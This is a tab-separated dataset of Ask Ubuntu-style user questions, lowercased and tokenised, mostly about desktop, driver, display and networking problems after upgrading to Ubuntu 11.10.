68625	is it possible to get the 11.10 unity desktop in 11.04 ?	i am running into severe problems with dual monitors+fglrx in 64bit 11.10 , whereas all was good in 11.04 . is it possible to get the same 11.10 unity experience in 11.04 ( transparency , lens etc etc ) ?
68631	why ca n't i play alien arena 7.51 ?	alien arena 7.51 is not working at all in either unity or gnome shell . i am using a thinkpad t510 with nvidia nvs 3100 discrete graphics . when i press the icon nothing happens . alien arena worked in ubuntu 11.04 64 bit on the same laptop .
68635	how do i debrand the boot splash screen ?	when i boot up my computer it displays a splash animation : the word `` ubuntu '' with dots underneath indicating that the system is loading . i 'd like to remove the word `` ubuntu '' and keep the dots . i do n't want to disable or remove the splash screen . i like ubuntu - i even like unity : d - i 'd just prefer a debranded look . is this possible ? answers applicable to both 11.04 and 11.10 preferred .
68637	can i bind 2 hotkeys to one compiz action ?	is it possible to bind `` put to next output '' action from compiz `` put '' plugin to 2 hotkeys combinations e.g . ctrl+shift+left and ctrl+shift+right ? i have dual monitor setup and i have been using similar shortcuts in windows 7 . compiz allows to only toggle ( without choosing specific output ) but it should be fine as a workaround if i can bind both hotkeys to this action .
68638	is `` gdmflexiserver '' part of the default installation ?	while playing around , i discovered a folder in my $ path that i did not recognize : $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games $ ls /usr/lib/lightdm/lightdm gdmflexiserver apparently gdmflexiserver is used to start another x session or some such . is this part of the default package ? i do n't see the use for it for a normal user , and it seems odd to have in one 's path , especially when it is just for one program . why would it not be under one of the other paths in that case ?
68640	how do i hide thunderbird from the launcher while running ?	i have a question for you all . it 's possible to `` hide '' thunderbird from the unity application bar when thunderbird is running ? for my is unhelpfull see thunderbird on the `` mail '' tray ( near shutdown button ) and the unity `` running '' application . if i close thunder with the close button , it do n't notify me new email .
68641	spread does not activate when restoring minimised windows across different workspace	i have recently upgraded to 11.10 and am now trying to figure out how to use the unity interface . i am having problems restoring minimised windows when i have more than one window for any given application open on different workspaces . this is what i am trying to do : step 1 : launch a new terminal window step 2 : switch to a different workspace step 3 : launch a new terminal window on the new workspace step 4 : minimise this terminal window step 5 : click on the terminal icon in the unity dock when i perform the last step nothings happens , unless i use unity 2d in which case i get the expected spread and i can select a terminal window . is this a bug or a feature ?
68642	mozzplugger not working in lubuntu 11.10	i 'd like to open a pdf in a firefox tab . i 've been able to do it with mozplugger before updating to 11.10. preferences - > applications now scroll down , then i see always ask next to file . i guess i need to change always ask to mozplugger . to do that i need to find out where mozplugger is . however , it was n't in .mozilla . am i doing the right thing ? how can i find out where mozplugger is ? ======================================================================= fix sudo gnome-open /etc/mozpluggerrc # need to be root to edit find a pdf block and change to the following : application/pdf : pdf : pdf file application/x-pdf : pdf : pdf file text/pdf : pdf : pdf file text/x-pdf : pdf : pdf file application/x-postscript : ps : postscript file application/postscript : ps : postscript file repeat noisy swallow ( evince ) fill : evince `` $ file '' open firefox 's help - > troubleshooting information - > click on open containing folder - > delete pluginreg.dat ( you may need to delete your local $ home/.mozilla/firefox/pluginreg.dat file for mozplugger to be enabled correctly after you update it . ( it will get regenerated ) ) the last step was necessary for me .
68645	gpgkeys : key c927ebe00f1b0520 not found on keyserver	i am using 10.04 lts - the lucid lynx , i shutdown the computer while one software updates running . then after i restart my computer and when the updates manager is running , the following error occurs . could not download all repository indexes the repository may no longer be available or could not be contacted because of network problems . if available an older version of the failed index will be used . otherwise the repository will be ignored . check your network connection and ensure the repository address in the preferences is correct . gpg error : http : //toolbelt.herokuapp.com ./ release : the following signatures could n't be verified because the public key is not available : no_pubkey c927ebe00f1b0520failed to fetch http : //ppa.launchpad.net/rabbitvcs/ppa/ubuntu/dists/distribution/main/binary-i386/packages.gz 404 not found i gone through the link how do i fix the gpg error âno_pubkeyâ ? and i ran the following command sudo launchpad-getkeys please wait ... launchpad-getkeys is running an update so it can detect the missing gpg keys trying to import all the missing keys gpg : requesting key 0f1b0520 from hkp server keyserver.ubuntu.com gpgkeys : key c927ebe00f1b0520 not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 launchpad-getkeys has finished importing all missing gpg keys . try running sudo apt-get update - you should n't see any key errors anymore but when i run sudo apt-get update again , it again shows that the key was not found on the keyserver . how to solve this problem ?
68648	how do i configure gnome shell to use super- # for shortcut keys ?	i 've just installed gnome shell instead of unity , and so far i like it more . however , there 's something from unity that gnome shell is lacking , and that 's the ability to launch the shortcuts from the dash using super + n , where n = 1,2,3 ... is there a way of configuring it so it works the same way ?
68651	music folder appearing twice on dash	i installed 11.10 this week and , so far , this little detail have been bugging me . since i moved my old audio files from a flash drive to the music folder , the music folder itself appears twice in the dash , under the `` search files '' . i know that it has something to do with the bookmarks of the home folder , since i had similar problem once , but the bookmarks are okay ( music folder shows only once there ) . i 'm sure i do n't have two music folders , so why are two folders , both linking to the same path , appearing side-by-side in dash ? how do i remove one of them ?
68652	what limits are set on ubuntu one upload size and number of files ?	i need to sync a folder with around 13,000 files , adding up to about 21gb in total . can i sync this folder or is there a limit on files ?
68653	unuseable slow internet connection	yesterday i installed ubuntu 11.10 on my desktop computer , and the wireless connection is so slow that it takes 3 minutes to load google.com . with my ubuntu netbook also running 11.10 i do not have that problem . please help me
68657	how can i print to djvu file as we do create pdf ?	how can i print to djvu file as we do create pdf using 'print ' menu item of the programs ?
68658	what happens with the source code when submitting an application	this is a follow up question for : how updates are handled for commercial applications ? when i submit an application for inclusion in the software center , i have to upload a debian source package . what happens with the source code ? does it get published or not ? what about a python application ?
68662	virtualize a linux physical server	i have an old proxy server uname -a : linux proxy 2.6.18-6-686 smp etc etc i think it 's debian ( i have apt-get ) . i 've read an interesting article to achieve the virtualization result : http : //www.madgenius.com/blog/index ... .vm-server.html but this server has different disks : df -h : filesystem dimens . usati disp . uso % montato su /dev/sda1 28g 4,6g 22g 18 % / tmpfs 1015m 0 1015m 0 % /lib/init/rw udev 10m 96k 10m 1 % /dev tmpfs 1015m 0 1015m 0 % /dev/shm /dev/sda2 92m 12m 75m 14 % /boot /dev/sdb2 25g 5,9g 18g 26 % /log /dev/sdb1 9,2g 96m 8,7g 2 % /squidcache it acts mainly as proxy server but it has a lot of iptables rules . i 've tried to save and import in a new server i 've prepared , getting only errors ( iptables-save and then iptables-restore ) i would like to do a perfect cloning of it and , if possible , virtualize it in a vmware esxi server . what path should i take ?
68663	can i configure the unity launcher to appear on both of my monitors ?	i would like to have the unity launcher appear on both of my monitors . if the launchers could be configured to show only the windows active on their respective monitors , that would be even better . how would i go about doing this ?
68666	how fix initframs	when i boot my server pop this kind problem how i can fix this ? it skip this if i write exit . i tried ubuntu 10.04 server and 11.10 server same problem on 10.04 an 11.10 . gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enought ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/mapper/dell-850-ville-1 does not exist . dropping to a shell ! busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu11 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initframs ) amd-64 bit , 2gb ram , dell pe850 pentium 4
68672	change background color/colour displayed in fvwm	i use fvwm windows manager ( and i do n't have gnome/unity installed ) . the background colour of my window is set by ubuntu - it is the same colour as the background to the login screen . indeed , the fvwm faqs notes that : setting the background image is not really part of the window manager . if you are using one of the linux distributions , most likely , some part of the distribution is setting the background for you . in previous versions ( 10.04 ) this background colour was a tasteful brown , but now in 11.10 it is an unbearable blue . how do i change it please ?
68676	new mac mini 5,1 wireless & bluetooth not working	sudo dmidecode -s system-product-name macmini5,1 i have the newest available mac mini at time of this writing . installation of ubuntu 11.04 and 11.10 goes ok only bluetooth and wireless is not working . bluetooth currently i 'm running 11.04 as according to : https : //help.ubuntu.com/community/macmini4-1/maverick # wireless to get bluetooth working i need to install btusb-dkms which is not available from ppa in 11.10 yet . this have not gotten my bluetooth to function however . wireless as the new mac mini is based on i5 and sandy bridge and not the old intel core 2 duo tech , i tried following some of the new macbook air guides without luck as well . the wireless is not displayed at network-manager and unfortunately i do not know how to figure out what driver i need for that , so if anyone can be helpful with that i will gladly post any output of any commands here . my main concern is the wireless , as for some reason the bluetooth keyboard and mouse works without os interference for now probably because it was linked from os x before ubuntu was installed . any help or guidance will be greatly appreciated . update nov 7th : kernel 3.1 supports bluetooth out of the box . the wireless broadcom b43 is still not working . there are different hacks to the kernel to get wireless working but i have not had any success with any of them .
68677	running program on startup	i wrote a program in bash , and now i want to run it on startup for all users so that nobody can cancel it , except for root . how can i do it ?
68679	how to install a list of programs in a .txt file automatically through a terminal	i 'm sure i 've seen instructions on how do do this unfortunately it was a few months ago and have forgotten them . thanks in advance to anyone who answers .
68680	completely remove unity and use gnome-shell instead	i really want to use gnome-shell instead of unity . but when i installed gnome-shell if found some interference from unity in gnome-shell desktop.. i want to use gnome-shell as in fedora or arch , without any add-ons from unity . how to completely remove unity without affecting my system ?
68681	how do i switch back to evolution and ensure that it is integrated with the desktop ?	i would like to use evolution as the default mail client . thus , i 'd like to have evolution integrated with the desktop instead of thunderbird ( especially concerning the mail symbol on the desktop bar ) . has anyone experience 'reverting ' to evolution ? i did change the mail client setting in the default applications section in system info dialog from 'thunderbird ' to 'evolution ' . this has the effect that the mail application started from unity launcher is indeed evolution , yet , this setting does not replace thunderbird with evolution in the desktop bar . and , it does not enable desktop notifications for evolution , as a consequence .
68684	how to share folder with dos on virtualbox	the host is ubuntu 10.04 , and i have already installed freedos on virtualbox.since i ca n't get to the internet on freedos , i hava to share some files with freedos.but how ? i know how to share a folder with a linux guest , but there are no file for dos in vboxguestadditions.iso . i find this page but its host is windowxp.how can i share folders with a dos guest and ubuntu host in virtualbox ?
68690	problems with moving maximized windows to different workspaces in 11.10	i use several workspaces and often move windows from one workspace to another using ctrl+alt+shift+arrow keys . this used to work perfectly , but now it will move the maximized window halfway off the screen randomly instead of being fullscreen . this leads to very glitchly looking problems . for example , i could move the maximized window in my top left workspace around a few times and then i 'm left with a window that has 25 % in the outer corner of each workspace ! in addition to this , i 'm getting alerts on my browser that pop up on other workspaces and become impossible to click even after switching them . it 's as if the window is supposed to be on one workspace , but actually on another .
68692	ubuntu one files guide for android ?	i ca n't find any guide or faq anywhere so i have to ask these silly questions . when i add a new folder to be synced it always claims the folders are empty . how do i set up folders to be synced on the android ? the photos will not back up as well . i read another post which suggested that i may need to change where to look from dcim to dcim . but there does n't seem to be a way to do this . thanks
68693	could not resolve archive.ubuntu.com when reinstalling xorg	i managed to uninstall xserver-xorg completely , and now all i see when booting ubuntu is a blank screen . i 've tried reinstalling it through shell prompt ( recovery mode ) but every time i get errors similar to failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-all_7.6+7ubuntu7_amd64.deb could not resolve 'archive.ubuntu.com' i get similar ( not exactly the same though ) errors when running apt-get update or try to repair broken packages in recovery mode . it 's not just acrhive.ubuntu.com which ca n't be resolved , it 's also se.archive.ubuntu.com , repository.spotify.com , archive.canonical.com among others . the ubuntu desktop is not accessible , i can only make changes through the terminal in recovery mode , or through a bootable usb . i 'm running 64bit ubuntu 11.10 with hybrid graphics ( intel hd and amd ) . i tried adding nameserver 8.8.8.8 to my /etc/resolv.conf file but it made no difference . updating the hosts file like this did n't help either . running ping google.com returns ping : unknown host google.com it seems i 'm not even connected to any network , i will start investigating this right now . apt.log & sources.list what should i do ?
68698	too many battery-indicators in gnome-shell	for some reason i get more than one battery indicator in my panel . this has the unfortunate side-effect that my pc closes down ( only one of them is correct , the rest has 0 % battery left ) .
68711	how do i enable compiz in gnome classic ?	i am running ubuntu oneiric 11.10 . my understanding is that gnome classic is with compiz effects , and gnome classic ( no effects ) has no compiz . however , when i run gnome classic , compiz does not seem to be running . if i open compiz-settings-manager , i have all my settings , but none of them are taking effect . is there something i need to be doing to enable compiz in gnome classic ? as requested in the comments of the answers , here is the output of ~/.xsession-errors : gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/gnome/sessionmanager interface=org.gnome.sessionmanager method=is inhibited gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/gnome/sessionmanager interface=org.gnome.sessionmanager method=is inhibited gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/gnome/sessionmanager interface=org.gnome.sessionmanager method=is inhibited gnome-session [ 20450 ] : debug ( + ) : starting app : /org/gnome/sessionmanager/app37 gnome-session [ 20450 ] : debug ( + ) : gsmautostartapp : starting jockey-gtk.desktop : command=sh -c 'test -e /var/cache/jockey/check | | exec jockey-gtk -- check ' startup-id=102cff201a509beb8813189506573089800000204500036 gnome-session [ 20450 ] : debug ( + ) : gsmautostartapp : started pid:20888 gnome-session [ 20450 ] : debug ( + ) : starting app : /org/gnome/sessionmanager/app29 gnome-session [ 20450 ] : debug ( + ) : gsmautostartapp : starting update-notifier.desktop : command=update-notifier startup-id=102cff20 1a509beb88131895065698387500000204500028 gnome-session [ 20450 ] : debug ( + ) : gsmautostartapp : started pid:20889 gnome-session [ 20450 ] : debug ( + ) : gsmautostartapp : ( pid:20888 ) done ( status:0 ) gtk-message : failed to load module `` rgba '' gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerc hanged gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerc hanged gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerc hanged gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerc hanged gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerc hanged gnome-session [ 20450 ] : debug ( + ) : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerc hanged `menu_proxy_module_load ' : update-notifier : undefined symbol : menu_proxy_module_load ( update-notifier:20889 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : update-notifier : undefined symbol : menu_proxy_module_load ( update-notifier:20889 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : update-notifier : undefined symbol : menu_proxy_module_load ( update-notifier:20889 ) : gtk-warning ** : failed to load type module : ( null ) `menu_proxy_module_load ' : update-notifier : undefined symbol : menu_proxy_module_load ( update-notifier:20889 ) : gtk-warning ** : failed to load type module : ( null )
68715	which compiz plugins can i safely disable ?	on 11.10 , which compiz plugins are enabled by default ? i.e . i should leave them enabled for some particular reason . i 've imported my compiz settings from my previous install and so i ca n't tell . i 'd like to disable all unnecessary plugins because i 've noticed the potential for interference or performance issues . i do n't think i can trust the ccsm feature `` reset to defaults '' because when i use it i need to run unity -- reset afterwards in order for my desktop to work again ( implying that the default values it resets to are not the values that ubuntu/unity requires ) .
68718	squid proxy server ( or iptables ) will not let my users send or receive mail	i have an ubuntu 10.04 box that was once configured as squid transparent proxy . navigation was perfect : my windows clients had no troubles . the problem i had was that users were not able send or receive mail using outlook ( and outlook express ) . so i 've googled here and there and found out a solution : sudo iptables -t nat -a postrouting -p tcp -- dport 25 -j masquerade sudo iptables -t nat -a postrouting -p tcp -- dport 110 -j masquerade everything went great . now i 've enabled squid authentication ( the simple one using a text file ) and my outlook and outlook express stopped working again . i 've read that the problem is not really squid related because it wo n't proxy smtp or pop ... but i still need to solve it . nat ? port forwarding ? what kind of commands should i use ? the squid server has a single nic and can get on the internet and solve names using opendns servers witout problems . configuration on server : ip 192.168.1.210 subnet 255.255.255.0 gateway 192.168.1.5 on clients i use : ip 192.168.1.x subnet 255.255.255.0 gateway 192.168.1.210 i can add further details so please ask but i do n't know what could be needed to solve the problem . edit : sudo iptables -l chain input ( policy accept ) target prot opt source destination fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain fail2ban-ssh ( 1 references ) target prot opt source destination return all -- anywhere anywhere sudo iptables -l -t nat chain prerouting ( policy accept ) target prot opt source destination redirect tcp -- anywhere anywhere tcp dpt : www redir ports 3128 chain postrouting ( policy accept ) target prot opt source destination masquerade tcp -- anywhere anywhere tcp dpt : smtp masquerade tcp -- anywhere anywhere tcp dpt : pop3 chain output ( policy accept ) target prot opt source destination
68720	dell l501x display port screen issue	i got a dell xps l501x with a mini display port to vga connector for my external screen . on displays it shows me : acer technologies 24 '' ( which is the monitor ) but only lets me up to 1024x768 resolution ( the native resolution of this monitor is 1920x1200 ) . i tried adding a new mode with xrandr , but when i applied it , it reverted back to 1024x768 . as far as i know , the display port is controlled by the intel card , right ? any ideas or suggestions would be appreciated . thanks using ubuntu 11.10 32bit
68724	can not install google chrome	i am having trouble installing google chrome on my ubuntu 11.10 system . after downloading it from http : //www.google.com/chrome i am trying to open it with a double click . software center pops up , i see the loading wheel , then i get a message that the package can not be opened . any help would be appreciated .
68729	how to clean up without reinstalling ?	every few years i come to a point where my ubuntu gets rather bloated , as it is filling up with a lots of packages that i never use . so the goal is to roll the list of installed packages back to what ubuntu ships by default and then reinstall everything i feel missing ( as that 's faster then trying to sort out which packages are unused ) . how do i do that ? how can i find out if a given package is part of the default install or not ? or simply put : where can i find a complete list of packages that ubuntu installs by default ?
68730	how do i solve this super 11.10 heating problem	i just installed 11.10 64bit on my win 7 laptop but instantly i realized how hot the laptop become when i run ubuntu . i sometimes have to boot into windows just to cool down the laptop . i read this was a common problem with 11.10 and that there is kernel bug ( like i said i read from somewhere ) how do i solve this heating problem as clearly it has nothing to do with hardware as windows 7 runs quite cool but 11.10 always give a massive temperature hike ( not less than 55 degrees ) my rig : hp pavilion dv 6700 win 7/11.10 64 bit dual boot intel 965/ x3100 intel core duo 2.0 ghz 4gb ram
68741	finding cpu usage from top command	i 'm currently using top -b -d 1 > file1.csv to append the entire output to a csv file . however , i 'd like the cpu ( % us ) field alone to be entered in file1 . i 've gotten as far as this : top -b -d 1|grep cpu where i 'm able to view only the cpu entry . when i try top -b -d 1|grep cpu > file1.csv it does n't deem to work as i 'm not even able to view my file . my intention is to plot a livegraph for all the cpu values ( stored in a csv file ) dynamically . thanks !
68742	how do i change my wallpaper in lubuntu ?	about 2 days or so i upgraded my version of lubuntu from 11.04 to 11.10 . but the problem is that i now do n't know how to change my wallpaper . google does n't give me any answers .
68745	how can i pan single application 's audio ?	using the sound settings window ( last tab ) i can adjust all applications ' audio volume , independently from others . can i in a similar way adjust their stereo panning ? what exactly i would like to do , is to play music with banshee or youtube through the rear speakers only ( i have 5.1 speakers ) and my game 's sounds through front speakers . is that achievable ?
68747	some drives not seen	i just updated to ubuntu 11.10 . when i put in a 100mb zip floppy , it shows in the launcher but i 'm only allowed to eject it . i installed storage device manager and it sees the drive but all the files are greyed out . also , i 'm running ubuntu from a 80gb ide harddrive but it can not see my 500gb sata hard disk . any ideas ?
68750	live cd wo n't boot on lenovo thinkpad e525	i had ubuntu 11.04 installed for a while and that worked fine . but when i try to boot from the ubuntu 11.10 live cd , the screen gets black after the purple background of what used to be the selection menu ( where you could set boot options etc. ) . i tried to boot with nomodeset . it then boots fine , but as soon as x needs to be started for ubiquity to display , the screen falls to black again . with noapic it starts almost fine ( i can even hear the login sound ) , but still a black screen and no access to a tty . my system specs : processor : amd a4-3300m ram : 4 gb ddr3 video card : ati radeon hd 6480g can somebody help me ?
68757	can you disable the envelope icon in the panel without removing it ?	i wish to disable the envelope icon in 11.10 's menu bar . i do not want to remove it permanently from the computer . with previous versions , i could right-click those type icons to make them go away , but i can not find out how to do that in 11.10 .
68761	keyring password , unity in 11.10	login to 11.10 i input my password and shortly afterward i am asked for a keyring password . i realize that i was asked for this during installation ( second time lucky ! ) and i did enter a password ( what a mistaka to maka ) . this now entails my having to input the keyring password on every boot up ! looking at previous answers it would seem that the applications - accesories - password and encryption keys - was the suggested route . however i assume that was in gnome ( at this stage i look back in fondness ! ! ! ) certainly , i do n't get the same route in unity ! i saw a reference to seahorse in a terminal - but this results in several error reports and a sub windows which does not seem to open . the objective in this exercise is to log in using the login password and not also the keyring password ! any help would be appreciated - thank you
68763	how to change icons size inside unity ( e.g . on all programs panel )	how to change icons size inside unity ( e.g . on all programs panel ) . i can change launcher icons size but i do n't know how to do this `` inside '' unity . i made a screenshot with big icons which i 'd like to change .
68764	hp pavilion dv7 graphics driver	i just installed ubuntu 11.10 and i did all the software updates . when i went into additional drivers , i saw that my ati/amd proprietary fglrx graphics driver is not activated . it says ( post-release updates ) . i tried activating it , but it does not work ? ubuntu is really slow and nothing seems smooth ? also , my laptop fan is constantly on , which makes my laptop super hot . someone please help !
68766	enabling sync to vblank on xubuntu	how to enable sync to vblank on xubuntu ? i ca n't find settings for it . i have nvidia geforce 7600 card with proprietary drivers .
68767	i ca n't open the trash from the launcher 's trash icon	i am an upgraded user from ubuntu 11.04 to ubuntu 11.10 on ubuntu 11.10 when i click on the trash icon in the unity launcher , it does not open the trash can . why ?
68770	how to fix the gnome/unity shortcut for an application ?	i installed the development version of gimp , then found it too buggy , so switched back to the ubuntu repository version . in doing so , somehow gnome/unity/whatever became confused and now fails to open gimp either from the sidebar , the lens thingy , or clicking on an xcf file . running gimp from the command line works fine , and which gimp outputs /usr/bin/gimp , which is correct . how to fix the problem ?
68778	how can i make gnome-shell treat both monitors in the same way ?	gnome-shell seems to like to leave one monitor as `` fixed '' when you switch workspaces . additionally , there is no preview in the activities view of my secondary monitor . also , on the second monitor , where there should be either empty desktop space , or a copy of the panel , i just have a white bar . how can i get gnome-shell to treat my secondary monitor like the primary one ?
68781	installation problems on dell xps 15z	i have a dell xps 15z onto which i 'm trying to install 11.10 . i downloaded the 64 bit iso image and used unetbootin to create a bootable usb drive . i plug it in and it boots to the unetbootin menu which looks like this : my menu however , has the following options : default help try ubuntu without installing install ubuntu check disc for defects test memory boot from first hard disk try ubuntu without installing install ubuntu check disc for defects yes , the last three are repeated . it might also be important to note that this menu is displayed in a cli at what looks like 80x30 characters . when i select any of the options ( even `` boot from first hard disk '' ) , the menu stays the same , but the screen resolution changes so that now the menu ( which previously took up the full screen ) is not just in the top 1/16th of the screen . after that ... nothing . the menu just sits there . the fan on the computer fires up , so it sounds like it 's working hard , but nothing ever changes on the screen , even after 15-20 minutes . the only thing i can do is hold the power button to turn it off . the hardware support page says that i should change a setting so that acpi=off , but i have no idea how to do that since the menu i see does n't look like the one on the boot options page . given that it appears to hang when the video resolution changes , might this have something to do with video card support ? is there anything i can do about this ?
68784	sound menu disappeared	the sound menu have disappeared in 11.10 have anyone had a same problem ?
68785	hibernation causes crashing on an acer aspire	hibernation worked perfectly fine in 11.04 . ever since i upgraded to 11.10 , my laptop ( acer aspire ) keeps crashing when it 's hibernating . i have no clue why . any ideas ? at first it seemed to only happen between 6a-noon ( us eastern time ) , but this morning it happened earlier . ( ps . i checked /var/log/syslog but i 'm not sure what i 'm looking for . i thought something might jump out at me as an obvious error in hibernating or coming out of it , but nothing seemed unusual . i 'm a bit of a newbie in this area so i might be missing something in lines upon lines upon lines . )
68787	how to enable a not showing desktop on startup ?	well the title pretty much explains itself , the problem i have is on 11.10 . after entering `` gsku nautilus '' the desktop reappears , but it 's as admin and doing this every log in is a pain in the ... i 'd appreciate your help !
68788	how can i resize the unity dash ?	when i open the unity dash from the launcher , the dash takes up the whole screen and does n't give me the ability to resize it . this makes it impossible to see my desktop and drag and drop icons to it in order to create shortcuts . i 've seen some screen where the dash has maximize and minimize buttons , but i do not have anything like that on my 11.10 install . unity dash - no resize option
68791	xorg and modelines for sony bravia kdl-40cx523	does anyone know where i can find the correct modelines so i can configure my sony tv to be recognised and have full ( or close to ) hd resolution ? intel 965 gm graphics , i know it 's not the best but window $ will configure it , surely ubuntu can to ?
68793	how do i unlock a user account ?	i 've been to system settings and to user accounts . my account is the only one on the system and i have previously been able to unlock the screen so that i could set my account to login without password prompt . that did n't make any effect on the system . i still have to enter a password to log in , but now i ca n't unlock the user accounts dialog to make any changes at all . what do i need to reset ? note how the unlock box in the upper right hand corner is n't available for selection ...
68794	how do i create shortcut icons to the desktop ?	if i right click on the desktop , i do n't see that option . where can i create shortcut icons ?
68795	who takes up decisions prior to development in ubuntu ?	i am an absolute linux beginner trying to wrap my head around open source . i was keen to know about who is the key player in taking up decisions for open source development . how do the developers agree on a new functionality or feature ? for instance , to be more precise , let me ask who was responsible for the introduction of unity in 11.04 ? obviously it might have been introduced as a creative thought irrespective of how it is received by users . so who exactly suggests these ideas in the ubuntu team ? even if one does suggest such a new creative feature , how is it agreed upon as a common standard by the rest of the development team involved ?
68799	why ca n't i change my volume keybindings ?	my laptop 's default sound adjustment keys are fn + up/down . in gnome 2.x i easily changed this binding to my keypad 's upper right keys ( / and * ) . it seems that gnome 3 is allowing me to change the keybinding but when i press those buttons it still prints out the / and * symbols . it appears that nothing but the default media key bindings will register . is this a bug i should report or is this intentional behavior by gnome ? i do know they block assigning regular keys for protection of losing keyboard functionality but in this case it does allow me to assign it , it merely does n't work . edit : i 've found that the same thing happens under kde as well . i believe that gnome is not to blame . what is preventing these keys from registering their assigned actions ?
68801	how can i get ctrl+alt+f* working ? | why runlevel does n't starts automatically ?	i googled many threads on my problem , but most of them are about proprietary drivers and black screen ( although user can login blindly into tty* ) . my question is n't about that type of problem but the following : i have ubuntu 11.04 , ati radeon hd2400 mobility video card with installed up-to-date proprietary drivers ( fglrx ) which works normal with compiz . ps aux|grep tty returns only one with x : root 1083 5.1 7.1 296396 148148 tty7 ss+ oct18 54:08 /usr/bin/x :0 -nr -verbose -auth /var/run/gdm/auth-for-gdm-vtleqw/database -nolisten tcp vt7 cat /etc/default/console-setup |egrep -v `` ^ # '' verbose_output= '' no '' active_consoles= '' /dev/tty [ 1-4 ] '' charmap= '' utf-8 '' codeset= '' uni2 '' fontface= '' fixed '' fontsize= '' 16 '' if [ -f /etc/default/keyboard ] ; then . /etc/default/keyboard fi and when i hit ctrl+alt+f1 am getting a blinking underscore cursor and nothing else . i have no directory /etc/event.d/ to search ttys in it . okay after a hint ( to check /etc/init/tty*.conf ) i realized that runlevel 3/5 did n't ran automatically : runlevel returns : runlevel unknown echo $ runlevel returns `` '' ( nothing ) and sudo init 5 bringed to me ctrl+alt+f* console login prompts . but keybord works only on tty1 . ps aux|grep tty now returns one with x , and tty1 : root 1083 3.4 6.2 267172 128944 tty7 ss+ oct18 66:37 /usr/bin/x :0 -nr -verbose -auth /var/run/gdm/auth-for-gdm-vtleqw/database -nolisten tcp vt7 root 2722 0.0 0.0 1872 580 tty1 ss+ 16:40 0:00 /sbin/getty -8 38400 tty1 why ? second question is : why runlevel 3/5 does n't start automatically ?
68802	enable external vga output on a laptop with a broken screen	i have a laptop ( packard bell with nvidia graphics ) with broken screen . how do i enable the vga external output for an external monitor ? ( i suppose that i have to change the x configurations ? )
68805	how can i install subversion 1.7 ?	for various reasons i need a newer version of subversion ( svn ) running on my 10.04 server , how can i install subversion without having to compile it from source ( i really only need the client and building apr and all of the rest of the requirements seems potentially problematic when there must be a package for it somewhere that will run on ubuntu 10.04 ) . i just do n't know where to search for packages and googling subversion 1.7 has n't helped at all .
68806	how do i get an acer flatbed scanner 22 working ?	i have a scanner and i searched on google that the linux is the only one o.s . that have compatibility with this scanner ( acer flatbed scanner 22 ) . before i upgrade my ubuntu o.s . from 11.04 to 11.10 it was working , but 1 day before i upgrade it wasn`t working anymore on windows 7 enterprise 64 bits ( my other system , wich one a made dualboot ) someone have the same problem and could help me
68807	how can i configure `` mousekeys '' ?	under 11.04 , the option to control the pointer with the numpad was set in the hardware/keyboard settings page . how can i turn on mousekeys or configure them in newer releases ?
68809	how to format a usb or external drive ?	using ubuntu 11.10 , how do i format an external or usb drive ? i do n't find an option to 'format ' when i right click . in the new version , the drives do n't come up on the desktop but instead come on the launcher .
68811	graphics card problems with lenovo ideapad z570 w/ nvidia 520m	my lenovo z570 have 2 graphic cards intel hd and nvidia 520m . in ubuntu 11.04 i used wobbly windows which but now in 11.10 i can not use it . when my system shows me restricted drivers available i downloaded them , installed them and reboot but no difference . if i am gon na use gnome without nvidia drivers it looks excellent , after installing them and rebooting system goes into classic mode . and i tried to do something i saw searching on net , but that ended with a black screen after booting windows or just a terminal asking my username and password nothing else . the result of that was reinstalling ubuntu from scratch .
68813	no access to my own external hard drive ?	i have only used my external hard drive once , wich was with my previous ubuntu installation ( 11.04 ) , on the same laptop . i have created 2 partitions , fat32 and ext4 . now i needed to get some data from my external hard drive and it would not let me . no matter what i do in nautilus , it will not do a thing with it . it is not corrupted . when i do mount /dev/sdb1 /media/sdb1 in a terminal , it said permissions denied ... ( so it wo n't allow me to access my own data ? ? ) . when mounting it as root , it works , but i do n't want to . things should simply work , normal users do n't want to dive into a command line and go edit text files to do a simple action like mounting an external hard drive , and neither do i . when mounting it as root , by the way , and running sudo chown robin /media/sdb1 it even sais permission denied , while i am running the command as root ! frankly , i 'm getting sick of things like this . any way to fix this for once and forever ? no solutions please that i 'll have to apply every time i reinstall ubuntu on my laptop or anything like that . i am a user , i want to use . not dive into command lines and text files for the simplest possible actions . -- edit -- just to clarify , i 've got no problems with typing a few commands in a terminal windows , as long as that solved the problem permanently . i do n't want to have to go through a mess like this on every computer or every time i reinstall my os .
68814	how do i enable system sound ( beeps , login ) ?	small problem here . since i installed ( 2nd time ) ubuntu 11.10 i ca n't hear the login sound , nor any `` beep '' sound when something went wrong . i may need your help here , because i ca n't find the solution in the `` sound configuration ''
